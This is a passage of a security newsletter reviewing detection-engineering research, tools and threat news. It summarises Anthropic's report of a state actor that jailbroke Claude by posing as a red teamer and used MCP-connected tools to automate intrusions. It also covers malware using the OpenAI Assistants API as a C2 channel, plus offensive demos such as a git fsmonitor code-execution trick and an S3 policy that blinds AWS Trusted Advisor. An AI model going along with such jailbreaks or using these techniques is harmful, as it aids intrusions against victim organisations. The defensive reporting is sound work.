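    """Fail the pipeline if a candidate rule alerts on known-benign logs."""
    hits = [e for e in baseline_events if matches(rule, e)]
    return {"passed": not hits, "false_positives": len(hits)}

rule = {
    "title": "Security Log Cleared Via Wevtutil",
    "detection": {"Image": "wevtutil.exe", "CommandLine": "cl Security"},
}
baseline = [
    {"Image": "explorer.exe", "CommandLine": ""},
    {"Image": "wevtutil.exe", "CommandLine": "qe Application"},
]
print(good_log_gate(rule, baseline))  # {'passed': True, 'false_positives': 0}
```

Any hit against the benign corpus is, by definition, a false positive, which is exactly the contract the evtx-baseline check enforces.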

Separately, the regression testing pipeline ensures that a change in the rules doesn’t introduce any regressions that could cause false negatives and forces submitters to contribute a sample of a malicious log to validate its usefulness. The maintainers may also request reference links to blogs, threat intelligence websites such as VirusTotal, and even malware sandboxes to ensure they understand the efficacy of the rule before merging.


🔬 State of the Art

Stopping kill signals against your eBPF programs by Neil Naveen

This post is an excellent study in the cat-and-mouse game of threat detection on Linux systems. For the most part, eBPF-style security agents are the de facto standard for telemetry inspectability and detection & response. This newsletter has featured plenty of research on how threat actors on Windows spend time trying to disable EDRs to go unnoticed during their operations, but I had seen little, if any, research on protecting eBPF agents from attacks on Linux until I read Naveen’s work here.

When you want to terminate an eBPF agent, you need root privileges, as these agents run as Linux daemons. If an attacker does manage to get those privileges, they can send a kill signal to the process and then Bob’s your uncle. But what if you wanted to add extra steps to collect even more telemetry and find a compromise? Naveen came up with two options:

  • Using eBPF to hook kill and never let anything kill it

  • Leveraging cryptographically signed nonces as an added layer of assurance before accepting a kill signal, so you don’t lock yourself out of restarting your own agent
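
To make the second option concrete, here’s a stdlib-only sketch of the nonce idea. It uses HMAC as a stand-in for the asymmetric signature in Naveen’s design; a real agent would verify a public-key signature so the signing key never lives on the monitored host:

```python
import hashlib
import hmac
import os

SHARED_KEY = os.urandom(32)  # stands in for the operator's signing key
_seen_nonces = set()

def issue_nonce() -> str:
    """Agent hands out a fresh nonce that any kill request must sign."""
    return os.urandom(16).hex()

def sign_kill_request(key: bytes, nonce: str) -> str:
    return hmac.new(key, f"KILL:{nonce}".encode(), hashlib.sha256).hexdigest()

def authorize_kill(nonce: str, signature: str) -> bool:
    """Accept a termination request only for a correctly signed, never-replayed nonce."""
    if nonce in _seen_nonces:
        return False  # replayed nonce: reject
    _seen_nonces.add(nonce)
    expected = sign_kill_request(SHARED_KEY, nonce)
    return hmac.compare_digest(expected, signature)

n = issue_nonce()
sig = sign_kill_request(SHARED_KEY, n)
print(authorize_kill(n, sig))  # True
print(authorize_kill(n, sig))  # False: the nonce was already consumed
```

The replay protection matters as much as the signature: without it, an attacker who captures one legitimate kill request can terminate the agent at will.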

I’ve been doing Linux development, both offensively and defensively, for over a decade. This is probably the first time I’ve seen a clever application of cryptography to give a defense-in-depth approach to Linux detection & response. Here’s Naveen’s workflow comparing and contrasting a standard public-private key setup to a nonce-based signature kill methodology:

Example signature flow from Naveen’s post

Of course, actors can also do fun stuff where they attack the Network stack directly and prevent the agent from reaching out to your security vendor’s domain for additional alerting.


Technique Research Reports: Capturing and Sharing Threat Research by Andrew VanVleet

This post serves as a follow-up to VanVleet’s research into detection data models (DDMs). DDMs are a form of documentation for detection engineers to help transcribe knowledge from an attack technique into actionable detection opportunities. But, there’s always more to a detection rule than the specific telemetry it’s trying to capture. This is where VanVleet introduces Technique Research Reports (TRRs).

The idea behind these reports is to capture the research knowledge surrounding the technique and rule. This is probably the most challenging part of our jobs, because individual research methodologies vary. You may be an expert in a specific attack surface or style of attack, but it doesn’t do your team any favors if you can’t help them learn how you arrived at a rule. It’s even worse if you leave the team and folks are left trying to understand the specifics of the attack, as well as the environmental context and the research you’ve performed.

I see a lot of similarity with MITRE ATT&CK’s recent v18 launch, specifically Detection Strategies. “Identify possible telemetry” is, in general, where Detection Strategies stop and TRRs begin. Log sources are environment-specific, and although you may have Sysmon, EDR, or syslog logs, they become nuanced based on your environment setup. For example, whether you query CrowdStrike or SentinelOne will shape your log source query.

They are incredibly comprehensive write-ups, or “lossless” research reports, as VanVleet calls them. For example, the TRR for DCShadow attacks is a fantastic resource for detection engineers to understand the intricacies of a Rogue DC attack. It can be a blog post in its own right. However, this is where the tradeoff between documentation quality and the velocity of maintaining a ruleset comes into play.

I love this research, but given how much valuable time he invested in it, it may not be conducive to productivity unless your leadership allows you the time to do so. I also worry about drift in techniques and telemetry sources, which can make some of these reports outdated. LLMs could help solve some of this, because they are generally very good at parsing and maintaining knowledge bases.


Weird Is Wonderful by Matthew Stevens

This is a short-but-sweet commentary on the role of detection engineers and how we need to “catch the weird.” It’s always nice for me to see fresh takes on concepts I’ve talked and read about for years. When folks try to break into this industry, they are sometimes bombarded with extremely technical concepts, complex environments, and a wide array of technologies they must learn before they feel useful. But, sometimes, it’s nice to hear from others who can distill complicated subjects into easy-to-understand concepts.

Catching weird, to me, is the idea that we all succeed at our jobs when we can distinguish normal from malicious. Weird may not be malicious, so having some intuition around things that look off can help solidify the baseline of normal in your environment versus something not normal. It’s a professional paranoia, of sorts :).


Be KVM, Do Fraud by Grumpy Goose Labs / wav3

This is a follow-up to Grumpy Goose Labs’ research on hunting for KVM switches to detect fraudulent employees. It’s full of Kim Jong-un memes, but there are excellent technical details around detecting KVM switches in your environment. The author, wav3, uses CrowdStrike as their example and dumps a bunch of information on how to hunt indicators ranging from KVM devices to display settings and product identifiers, so you can see who among your workforce may be using these risky devices.


☣️ Threat Landscape

⚡ Emerging Threats Spotlight: Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

Disrupting the first reported AI-orchestrated cyber espionage campaign by Anthropic

Last week, the threat intelligence team at Anthropic disclosed the disruption of the “first-ever” AI-orchestrated espionage campaign by a Chinese-nexus threat actor. GTG-1002 is the designation for this threat cluster, which Anthropic attributes with high confidence to a Chinese state-sponsored operation. In this summary, I’ll break down the architecture and Anthropic’s analysis of the attack workflow, share my commentary on the parts of the report I like and dislike, offer my medium-high confidence analysis of details missing from the report, and provide takeaways for detection engineers.

Attack Architecture

The most interesting aspect of this operation is that Anthropic had visibility into the orchestration layer of the threat activity, which leveraged a combination of Claude and several MCP servers. They claim the threat group ran 80-90% of their operations autonomously, an impressive feat when you consider that this is a nation-state operation. GTG-1002 managed to jailbreak Claude into thinking it was talking to a red teamer, allowing them to instruct Claude to work on their behalf.

If you had told me last year that a nation-state would trust an AI system to execute its campaigns against victims, I would have (rudely) laughed in your face. But it looks pretty slick:

Architecture diagram pulled from the Anthropic report.

For those unfamiliar, the Model Context Protocol (MCP) provides a standardized way to connect a human interface, such as chat or code editors, to external tools like APIs. AI applications like Claude ship with only a small set of built-in tools, so writing your own connectors to centralize your chat interface around whatever toolset you want is a powerful feature of these platforms.

According to Anthropic, GTG-1002 built a suite of MCP servers that connected to several open-source toolsets dedicated to performing reconnaissance and fingerprinting, exploitation, post-compromise lateral movement and discovery, and eventually, collection and exfiltration. This is the impressive part of the operation: imagine an operator leveraging a chat interface to create a scalable infrastructure for red team operations, with the “backend” attack tool system handled by Claude and capable of scaling as needed.

The team claims that, based on their visibility into Claude usage, the operators automated 80% to 90% of their attacks. The remaining 10%-20% involved human verification at the “Report & Analysis” step, as shown in the diagram above.

Attack Flow

Anthropic grouped the attack operations into five phases, as shown above. The “robot” in each phase represents the MCP server, directing specific tools to perform tasks along the ATT&CK kill chain. The human icon next to the robots indicates a manual validation step. These pit stops serve as a verification gate to make sure Claude is behaving correctly and not hallucinating.

In the report, the validation steps did surface a myriad of hallucinations. Anthropic claims Claude returned incorrect results, non-existent credentials, and wrong IP addresses. So, although the attack flow diagram shows a clean, step-by-step process for each phase, these operations were frequently rerun.

Pros & Cons

This report has received criticism from the security community since its publication. To me, it’s a landmark report, and famous or infamous, it has left its mark. I want to list both what I like and don’t like about it.

What I like:

  • There’s an excellent demonstration of the unique visibility the Anthropic team has over attack infrastructure. It’s certainly a threat intelligence source that we can derive useful insights from, and foundational model companies like Anthropic and OpenAI can provide that

  • There is a specific call out around responsible disclosure to victim organizations. It shows the good intentions of the security team at Anthropic, and I hope to see more of that in the future

  • They admit shortcomings around how the actors performed jailbreaking to get Claude Code to help them with their operations, as well as limitations in hallucinations

  • The transparent technical context around the threat model of AI Trust was helpful to see and understand their day-to-day challenges

What I didn’t like:

  • They did not provide any indicators of compromise: no IPs, domains, hashes, signatures, or payload examples. That makes it hard for research teams to verify the findings independently

  • The attribution is vague, and it reads like Anthropic intentionally redacted proof around this activity. Indicators of compromise could help with this

  • It reads as if these attacks were cloud-based rather than on-premises. I couldn’t parse out whether the report differentiates, though it doesn’t change the severity of a Chinese-nexus APT cluster. The callout about attacks against databases, internal applications, and container registries makes me think this is a cloud environment

Overall, the report provides a net benefit to security teams on several fronts. The claim of an APT using modern AI architecture coming from Anthropic itself, rather than vendor marketing, is a step forward in our understanding of an evolving threat landscape. It builds trust in Anthropic’s security team, and Anthropic runs one of the most-used foundational model platforms today. If we got this report from another vendor, we’d question the efficacy of their security program.

I think the feedback is valid regarding the value of threat intelligence, but I only see them improving from here.


🔗 Open Source

tired-labs/techniques

Technique Research Report dataset from VanVleet’s work above. It has extensive documentation of several attack techniques, and the entries follow the style guide he describes in his blog. It also includes a link to a searchable frontend library for those who don’t want to navigate the GitHub repository.


ricardojoserf/SAMDump

Volume Shadow Copy dumping technique leveraging internal Windows APIs instead of the command line. When you run the binary, it won’t generate the traditional Sysmon telemetry associated with vssadmin.exe, which arguably makes it harder to detect. It has a few other tricks, including calling the NT API directly and avoiding GetProcAddress.


reconurge/flowsint

Open-source and graph-based OSINT tool that looks like a more modern take on Maltego. It has dozens of transforms, so you can get a good amount of functionality out of it to compete with Maltego. The differentiation here would be hosting something on your own, and if you require specific integrations, you’d have to build them yourself.


RootUp/git-fsmonitor

This is a fun initial access technique leveraging the fsmonitor capability of git clients. You edit the git configuration file and set the fsmonitor value to a shell script. When git is run, the shell script executes under the hood.
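
The trick is easy to reproduce in a scratch repository; the path and payload below are purely illustrative:

```shell
# Reproduce the fsmonitor trick in a throwaway repo
# (assumes a git version with core.fsmonitor hook support)
mkdir -p /tmp/fsmon-demo && cd /tmp/fsmon-demo
git init -q .

# Attacker step: point core.fsmonitor at an arbitrary script;
# git runs it under the hood on commands like `git status`
printf '#!/bin/sh\ntouch /tmp/fsmon-demo/proof\n' > evil.sh
chmod +x evil.sh
git config core.fsmonitor ./evil.sh

# Defender step: hunt for unexpected fsmonitor values in repo configs
git config --get core.fsmonitor
```

On the detection side, a rule watching for writes to .git/config, or for `git config` invocations setting core.fsmonitor, should catch this persistence path.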


DEW #137 - AI Agents For Security By Security, Free Sigma training & JA4 for beginners

12 November 2025 at 14:28

Welcome to Issue #137 of Detection Engineering Weekly!

✍️ Musings from the life of Zack in the last week:

hey you got a light? Nah Bud Light
  • I was in LA for a wedding and went to Venice Beach for the first time. It was awesome seeing pros at the skatepark, jamskaters, live music, and of course, this ^^ MF DOOM mural

  • Speaking of LA, there are Waymos EVERYWHERE

  • It started snowing here in New England, and we celebrated by running outside barefoot for as long as my family could bear it

This Week’s Sponsor: Nebulock

Trust Your Intuition. Vibe Hunt for Outcomes.

Good hunters feel suspicious activity before the alert ever hits. Vibe Hunting allows you to lean into that intuition and combine it with machine reasoning to hunt across data and telemetry without juggling tools. Nebulock’s threat hunting agents connect the dots, explain reasoning, and deliver contextual recommendations.

Hunting becomes less about process and more about bridging hypotheses with detection.

Start Vibe Hunting



💎 Detection Engineering Gem 💎

How Google Does It: Building AI agents for cybersecurity and defense by Anton Chuvakin and Dominik Swierad

I typically avoid including vendor blogs that stay at high-level concepts around complicated topics like security and AI. But this blog struck a great balance in how the authors approached internal Google security engineers who were skeptical of leveraging AI in their day-to-day work. I think this approach can be copied by any security organization looking to augment its security operations with LLMs, as it focuses on small, achievable wins grounded in risk reduction and reality versus “thinking big.”

Chuvakin and Swierad split this approach up into four steps:

  1. Hands-on learning builds trust: You wouldn’t purchase a SIEM without having your Detection & Response team understand how to use it, so why adopt agentic systems without the same hands-on understanding?

  2. Prioritize real problems, not just possibilities: Ground your agentic problems in a space where you are already familiar with the problems. They list two prime examples every D&R engineer could use to help with: analyzing large swaths of security data into insights, and quickly triaging malicious code to understand its function

  3. Measure, evaluate, and iterate to scale successfully: This section uses the dirty word/acronym “KPI” (cringes in business school). Instead, they gut-check success by asking two critical questions: “Did this meaningfully reduce risk?” and “How many repetitive tasks did this automate to free up capacity?”

  4. Get your foundations right: This is the most nuanced section and carries the most value for folks to steal. When you develop agentic systems, stick to simplicity in the particular task you need the agent to do. Agents aren’t security engineers; they are containerized experts in a small subset of tasks. Ensure they are proficient in those tasks, because what makes them powerful is how you connect them together.

The way I see this working for years to come is that we’ll have agentic workflows handle the “80%” work, such as repetitive tasks or analysis. The “20%” work that requires a ton of focus will be traditional expert work that we know and love. This split still requires us to have deep expertise in our field, but I worry about the value of learning from the more boring or tedious work.


🔬 State of the Art

Detection Stream Sigma Training Playground by Kostas Tsialemis

Tsialemis, a long-time contributor to the detection engineering research space and a multi-time featured author in this newsletter, just published a free Sigma training playground for detection engineers. His associated blog post covers the platform in detail, but it’s essentially a CTF for writing rules. Cool features include interactive challenges, responsive feedback, and the ability to write your own challenges and contribute them to the community.

A leaderboard always motivates me, too. #8 as of 10 November!


Mistrusted Advisor: Evading Detection with Public S3 Buckets and Potential Data Exfiltration in AWS by Jason Kao

Trusted Advisor is a free service from AWS that helps scan customer infrastructure for misconfigured security and resilience resources. One resource it helps find misconfigurations for is in S3 buckets, which have led to massive security incidents and breaches like those at Capital One and Twitch. So, if you can find a 0-day bypass to a security system like this, it can give an attacker the ability to evade defenses in your cloud accounts. And it appears that is what Kao and the Fog Security team did.

The basic premise behind this attack is setting an insecure policy that would normally generate an alert from Trusted Advisor, while explicitly denying the three actions Trusted Advisor uses for the check.

So the insecure policy statement spans lines 4-10, while the bypass occurs in a separate statement on lines 11-17. As it turns out, even AWS can get IAM wrong! The check effectively failed open here and reported that nothing was wrong, where the correct behavior is to fail closed when it can’t retrieve the telemetry needed to make an assessment.
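
Since the policy itself isn’t reproduced here, this is a hypothetical reconstruction of the shape of the bypass. The bucket name, condition, and the specific denied actions are my assumptions for illustration, not the exact ones from Kao’s post:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "InsecurePublicReadThatShouldAlert",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::example-bucket/*"
    },
    {
      "Sid": "HypotheticalDenyThatBlindsTheCheck",
      "Effect": "Deny",
      "Principal": "*",
      "Action": [
        "s3:GetBucketAcl",
        "s3:GetBucketPolicy",
        "s3:GetBucketPolicyStatus"
      ],
      "Resource": "arn:aws:s3:::example-bucket",
      "Condition": {
        "StringLike": { "aws:PrincipalArn": "*trustedadvisor*" }
      }
    }
  ]
}
```

The first statement is the misconfiguration that should trip the alarm; the second statement denies the checker’s read access so it never sees it.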

The team submitted the security disclosure to AWS, and AWS fixed it after two tries. It also looks like Fog Security wasn’t happy with how AWS publicly disclosed the issue, as the disclosure referenced a non-existent action, which the hyperscaler later corrected.


All you need to know about JA3 & JA4 Fingerprints (and how to collect them) by Gabriel Alves

This piece is an easy-to-understand introduction to the powerful TLS fingerprinting algorithms, JA3 & JA4. With TLS everywhere, the underlying Application Layer traffic has become much harder to analyze for potential security indicators. You could set up TLS termination, but there’s a large cost associated with building that infrastructure, and decrypting and inspecting traffic also leads to compliance issues.

The JA* algorithms solve this by building fingerprints of the unique characteristics of TLS handshakes. Virtually every implementation of TLS in code has its own quirks and intricacies that make it unique. When you add more infrastructure on top of that, it can be a powerful tool to cluster traffic in ways to identify malware families, hosting infrastructure or bots.
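
As a rough illustration of how JA3 works under the hood (JA4 uses a newer, more structured format): concatenate the ClientHello’s decimal field values in a fixed order and hash the result. The handshake values below are made up for the example, and a real implementation also strips GREASE values before hashing:

```python
import hashlib

def ja3_fingerprint(version, ciphers, extensions, curves, point_formats):
    """Build the JA3 string from ClientHello fields and return (string, MD5 hash).
    Field order: TLSVersion,Ciphers,Extensions,EllipticCurves,PointFormats."""
    ja3_str = ",".join([
        str(version),
        "-".join(map(str, ciphers)),
        "-".join(map(str, extensions)),
        "-".join(map(str, curves)),
        "-".join(map(str, point_formats)),
    ])
    return ja3_str, hashlib.md5(ja3_str.encode()).hexdigest()

# Hypothetical ClientHello values for illustration only
s, digest = ja3_fingerprint(771, [4865, 4866], [0, 11, 10], [29, 23], [0])
print(s)  # 771,4865-4866,0-11-10,29-23,0
print(digest)
```

Because the fingerprint depends only on how the client builds its handshake, two connections from the same malware build tend to hash identically even across different destinations.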

Alves provides readers with some great visuals to understand these unique fingerprints and utilizes the most powerful security tool in existence, Wireshark, to do so.


Agentic Detection Creation: From Sigma to Splunk Rules (or any platform) by Burak Karaduman

I’m seeing more blog posts leveraging agentic workflow platforms to build detection content, and I’m all for it. At this point in our journey in detection engineering, I don’t see why you wouldn’t have agentic rule writing to assist you. Here’s why:

  • MITRE ATT&CK serves as a rich knowledge base of tradecraft references that we all fundamentally agree is the standard

  • Telemetry sources are well documented, and the startup cost of booting up an environment for testing is decreasing more and more

  • Threat intelligence companies and blogs help piece together attack chains that you can generalize

  • Sigma serves as a universal language that forces rule content structure and documentation, and has a rich library of converters to your SIEM of choice

  • Detection as code pipelines serve as a quality gate for human review and for testing

  • SIEM APIs have capabilities to ingest a candidate rule and make sure it’s valid in its native language

Karaduman’s approach here follows the pattern I listed above, and it’s functionally sound. It follows a lot of the fundamentals of the detection engineering lifecycle. The agents take ideation as an input, and continuously research, design, and validate candidate rules. Once the Sigma rule is created, Karaduman leverages sigconverter.io to translate the rule into SPL and has a separate SPL validation agent to make sure it can run in production.
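
For readers new to Sigma, a minimal rule of the kind such a pipeline emits looks roughly like this (a generic illustration, not one of Karaduman’s rules):

```yaml
title: Security Log Cleared Via Wevtutil
id: 00000000-0000-0000-0000-000000000000
status: experimental
description: Detects clearing of Windows event logs with wevtutil
references:
    - https://attack.mitre.org/techniques/T1070/001/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\wevtutil.exe'
        CommandLine|contains: ' cl '
    condition: selection
falsepositives:
    - Legitimate log maintenance
level: high
tags:
    - attack.defense-evasion
    - attack.t1070.001
```

A converter then translates it into the target backend, e.g. something like `sigma convert -t splunk -p splunk_windows rule.yml` with sigma-cli, which is roughly the pySigma conversion that sigconverter.io exposes in a web UI.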

It’s a clever setup with several “smaller” agents performing tasks, which looks to be the optimal setup for this agent-to-agent workflow. I’m impressed at the simplicity of their architecture, and they were kind enough to include the fully visualized n8n workflow for readers to experiment with.

Can you guess what the most crucial step is here? The red box of course! It compiles every piece of documentation in the rule, validates it against Claude’s Sonnet 4.5 model, generates a report and messages the hypothetical detection engineer in email and on Teams.


☣️ Threat Landscape

GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools by Google Threat Intelligence Group

Unlike the cyberslop post from last week, where researchers at MIT made some bold claims on AI usage by ransomware operators, Google’s intelligence group brings the receipts on threat actor usage of LLM tools during operations.

I quite like the coining of “just-in-time” malware, leveraged by two families they track as PROMPTFLUX and PROMPTSTEAL. Both generate malicious code on demand, and it looks like a multi-step agentic process that creates the code and obfuscates it during malware execution.


U.S. Nationals Indicted for BlackCat Ransomware Attacks on Healthcare Organizations by Steve Alder

Two American security professionals were indicted for allegedly working as initial access brokers for BlackCat ransomware. This is a wild story: they both worked for a threat intelligence company named DigitalMint, conducting RANSOMWARE NEGOTIATIONS on behalf of victims. Talk about insider threat, right?

In a classic case of insider threat motives, the main conspirator was in debt and went into business with BlackCat to help relieve that debt. This is a common tactic employed by spy agencies, so, logically, it would also work for criminal gangs.


Ex-L3Harris Cyber Boss Pleads Guilty to Selling Trade Secrets to Russian Firm by Kim Zetter

Is it insider threat week? It feels like insider threat week. Zetter reports on a man who was arrested and pleaded guilty to selling trade secrets to an “unnamed Russian software broker.” The accused worked for L3Harris Trenchant, a U.S.-based developer of zero-day and exploitation tools, and earned over seven figures in the process.


Interview with the Chollima V by Mauro Eldritch, Ulises, and Sofia Grimaldo

This series by the Bitso Quetzal team highlights their research (and shenanigans) with live interviewing DPRK IT Workers. The interesting part of this interview, and potentially a change in WageMole's TTPs, is that they are interviewing and recruiting collaborators to conduct interviews on behalf of WageMole. There were early reports of this happening, but Grimaldo, Ulises, and Eldritch brought receipts in the form of chat logs, Zoom screenshots, and LinkedIn profiles.


LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices by Unit 42

LANDFALL is an Android spyware family targeting Samsung devices, discovered by Unit 42 researchers. They found this family while hunting for exploit chains related to the DNG processing exploit that Apple disclosed earlier this year. DNG is a file format that both Android and iOS can process, and it’s within this processing logic that the vulnerability and subsequent exploit chain exist.

It’s pretty neat how the Unit 42 team came across this malicious file: they were hunting for DNGs to replicate the iOS exploit and found one with a Zip file appended to it, but exploiting Samsung’s recently patched vulnerability from earlier this year. The team pulled apart the malicious DNG, found two .so files, and mapped out the command-and-control network associated with it.
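
That hunting idea generalizes nicely: flag files whose header says TIFF/DNG but which contain an embedded archive signature further in. A simplified sketch (real DNG parsing is far more involved, and the byte offsets here are illustrative):

```python
def has_appended_zip(data: bytes) -> bool:
    """Flag TIFF/DNG files that contain a ZIP local-file signature past the header."""
    tiff_magic = (b"II*\x00", b"MM\x00*")  # DNG is TIFF-based (little/big endian)
    if data[:4] not in tiff_magic:
        return False
    # A ZIP signature anywhere beyond the header is suspicious inside an image
    return data.find(b"PK\x03\x04", 4) != -1

clean = b"II*\x00" + b"\x00" * 64
trojaned = clean + b"PK\x03\x04" + b"zip payload"
print(has_appended_zip(clean), has_appended_zip(trojaned))  # False True
```

In practice you’d run a check like this as a YARA-style rule or a file-scanning job over mail and messaging attachments, which is essentially the hunt the Unit 42 team ran at scale.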


🔗 Open Source

OSINTI4L/Paper-Pusher

A Bash script for sending spam to WiFi-connected printers over LAN.

😭😭😭


karlvbiron/MAD-CAT

MAD-CAT is a chaos engineering tool that implements data wiping and corruption attacks against databases to simulate database failures and data wiping-style attacks for detection engineers. It supports six database technologies: MongoDB, Elasticsearch, Cassandra, Redis, CouchDB, and Apache Hadoop.


FoxIO-LLC/ja4

JA4 TLS fingerprinting library referenced in Alves’ post above. I’ve linked JA4 before, but it’s a seriously effective tool to add to detection arsenals, especially if you can instrument it in publicly accessible servers.


EvilBytecode/NoMoreStealers

A Windows minifilter driver that blocks filesystem access to specific file paths to prevent infostealers. The hardcoded paths it protects include browser secret data, cryptocurrency wallets and secrets, and chat applications.


Idov31/EtwLeakKernel

Event Tracing for Windows (ETW) consumer that requests stack traces to leak Kernel addresses. This can help with exploit development if you need to exploit a Kernel vulnerability and require base addresses, potentially defeating ASLR.


DEW #136 - ATT&CK V18 deep dive, Cyberslop @ MIT & Aisuru repurposes to residential proxies

5 November 2025 at 14:03

Welcome to Issue #136 of Detection Engineering Weekly!


✍️ Musings from the life of Zack in the last week:

  • I’m trying something different here and performing a deeper analysis on content where I think it matters for y’all. It won’t happen often, but whether it’s a Gem or a piece of Threat Landscape news, I want to give you all my take beyond what you normally see, especially if it’s a story I’m particularly passionate about!

  • I just hit my 4-year anniversary at Datadog, so time is flying by. My 3-year anniversary for the newsletter is in a few weeks and it feels wild thinking about doing this for 36 months.

  • I stole every adult-sized candy bar from my kids at Halloween, and I didn’t think twice about it.

This Week’s Sponsor: Hack The Box

Your Tools Don’t Defend. Your People Do.

Threats evolve faster than your tech stack. Hack The Box keeps your teams ahead of attackers with hands-on, continuous upskilling that powers real Continuous Threat Exposure Management (CTEM).

Equip your people with the skills to validate, prioritize, and respond effectively and build the true resilience that keeps your organization ready for whatever comes next.

Get Your Team Started


💎 Detection Engineering Gem 💎

ATT&CK v18: The Detection Overhaul You’ve Been Waiting For by Amy L. Robertson

New ATT&CK version drops always deserve a feature in this newsletter, and I’m very pleased to see the changes in v18!

There are several techniques and procedures added to the ATT&CK arsenal, but I’d like to focus my analysis on the usefulness behind Detection Strategies for detection ideation and tuning.

Detection Strategies

The new version shipped a large change in how ATT&CK approaches detections via Detection Strategies. I wrote about this in Issue 121, but the common gap with ATT&CK is linking a technique or procedure to detection guidance. Through the use of STIX Domain Objects, defenders can now leverage these detection opportunities via machine-readable data, rather than relying on freeform text. Here’s an example leveraging Scheduled Task/Job Abuse:

I used Linux as an example here. You have three data components associated with finding scheduled job attacks. Each of these components has a log source name and channel. So, for line 6 (DC0061), you can use auditd syscall monitoring and look for writes and renames of cron files. The mutable elements part helps with detection tuning, and this can be everything from frequency analysis to environmental context, such as unusual users scheduling jobs.
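
As a sketch of what that DC0061 guidance translates to in practice, here are hypothetical auditd watch rules for the usual cron locations (dropped into /etc/audit/rules.d/ and loaded with augenrules); the exact paths and key name are my choices, not part of the Detection Strategy:

```
-w /etc/crontab -p wa -k cron_change
-w /etc/cron.d/ -p wa -k cron_change
-w /etc/cron.daily/ -p wa -k cron_change
-w /var/spool/cron/ -p wa -k cron_change
```

Writes and attribute changes then land in the audit log, searchable with `ausearch -k cron_change`, giving you the raw events to layer the mutable elements (frequency analysis, unusual users) on top of.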

Enterprise Updates & ESXi Detection Strategy Example

The team added several new tactics, and there seems to be a big push on cloud-native technologies. For example, adding the Container CLI or API (in the case of Kubernetes) is a great step to capturing how threat actors are moving away from on-prem technologies but using similar techniques to move through the kill-chain.

Local Storage Discovery, for example, highlights typical discovery tradecraft for finding interesting volumes on a victim machine. But there’s nuance here with whether you are on a cloud server, Windows host, or a Hypervisor. Looking at the Detection Strategy DET0188, a detection engineer can switch between Analytics platforms and perform their own testing based on the data components and channels. Now let’s work through tuning, and I’ll pick on this Sigma rule, ESXi Storage Information Discovery Via ESXCLI.

Nas’ and Maurugeon’s rule successfully implements the Data Component → Name → Channel analytic, but the rule is broad (high recall) and requires tuning. If you study the Mutable Elements table, you can scope this rule down by restricting alerts to ssh_source_ip values from outside your perimeter, or by tuning the esxcli_command_scope. Let’s tune via the command scope.

After reading the developer portal for esxcli (with a bit of help from Claude), the command scope namespace looks like the following:

Lines 40-42 could be potential tuning updates to the Sigma rule to make it more precise. This would obviously need some testing, but moving from Analytic → Sigma Rule → ESXi command line documentation (thanks, Claude) to tuning was much easier.
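To make that concrete, here is the shape such a tuned Sigma selection could take — my own sketch pinned to a few real `esxcli storage` sub-namespaces, not the published SigmaHQ rule:

```yaml
# Illustrative sketch only, not the SigmaHQ rule
title: ESXi Storage Information Discovery Via ESXCLI (tuned sketch)
status: experimental
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        CommandLine|contains:
            # narrowed from any 'esxcli storage' invocation to the
            # sub-namespaces most useful for discovery
            - 'esxcli storage filesystem list'
            - 'esxcli storage core device list'
            - 'esxcli storage vmfs extent list'
    condition: selection
falsepositives:
    - Administrators auditing datastores
level: medium
```

This is the esxcli_command_scope mutable element in practice: stay broad for hunting, narrow to specific `list` commands for alerting.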

For a deep dive into this type of detection research, check out Nathan Burns’ blog on the topic, which I posted in Issue 100 as a Gem.

Why is this important?

In my example, I walked through a tuning opportunity for ESXi. I’m not an ESXi expert, but I have good knowledge of Linux threat detection and MITRE ATT&CK. The Detection Strategy quickly oriented me toward the core detection opportunities, and it also provided tuning ideas for moving from broad to precise esxcli commands to alert on. The SSH source IP mutable element took it a step further with environment-specific hardening.

The ATT&CK knowledge base can now serve as more than just a reference table for techniques. You can dive into each technique, get relevant threat actor examples, and be pointed to strategies with specific data sources and channels to alert on. It cuts down the time I would spend Googling, or setting up environments and smashing my head on the keyboard until I get the right logging configuration to generate the alert telemetry.


☣️ Threat Landscape

CyberSlop — meet the new threat actor, MIT and Safe Security by Kevin Beaumont

This new series by Kevin Beaumont revolves around a term he coined, “CyberSlop”: taking traditional FUD marketing techniques in cybersecurity and leveraging trusted institutions (like MIT in this story) to make AI-threat claims seem more credible, especially through research papers and blog posts that lack evidence.

The story in this first edition revolves around a bold claim by MIT researchers that 80% of ransomware gangs use AI in their operations. After Beaumont dug into the paper and publicly called it out, it disappeared from the MIT website. Two of the authors are from Safe Security, a cybersecurity startup, and as it turns out, the principal MIT researcher is on Safe Security’s board, with no disclosure of this conflict of interest in the paper.


Aisuru Botnet Shifts from DDoS to Residential Proxies by Brian Krebs

DDoS-for-hire botnets don’t pay enough for the criminals who run them. At the end of the day, DDoS is an inconvenience that sites suffer, and the Googles and Cloudflares of the world have gotten so good at soaking traffic that these attacks feel even more irrelevant than before.

Residential proxies, on the other hand, are where money CAN be made. This piece on the Aisuru botnet, a DDoS-for-hire operation turned residential proxy provider, is a good breakdown of those intricacies. Krebs exposes a web of proxy services, parent companies, and the gray-hat-style recruitment of unsuspecting devices that builds their new-age botnet.


Ukrainian National Extradited from Ireland in Connection with Conti Ransomware by U.S. Department of Justice

The U.S. DoJ extradited a suspected Conti member, Lytvynenko, who had been residing in Ireland. He was first arrested in 2023 at the request of the FBI and has been facing extradition proceedings since then. There are some wild numbers cited in this report, which highlight the prolific nature of Conti: Lytvynenko is accused of extorting $150 million in ransomware payments from Conti victims alone.


SesameOp: Novel backdoor uses OpenAI Assistants API for command and control by Microsoft Incident Response

This is the first threat report I’ve read where a threat group leverages OpenAI as a C2 channel. SesameOp is the name Microsoft Incident Response gave a new malware family that uses OpenAI’s now-deprecated Assistants API, which is slated for removal next year. The malicious DLL queries the Assistants API vector store to find infected hostnames and then leverages the Assistant’s description field to execute a command.

The vector store part here is interesting because I imagine it makes detecting abuse much more challenging for security teams at OpenAI. You can typically scan platforms for victim or malicious domains, but do you now need to scan every vector store for the same thing?


A new breed of analyzers by Daniel Stenberg

Stenberg, the creator and head maintainer of cURL, triages and patches numerous security vulnerability submissions. In the before-AI times, these submissions were (mostly) written by humans, with some level of automated slop from fuzzers. Since then, a large number of LLM-generated slop submissions have burdened the cURL team.

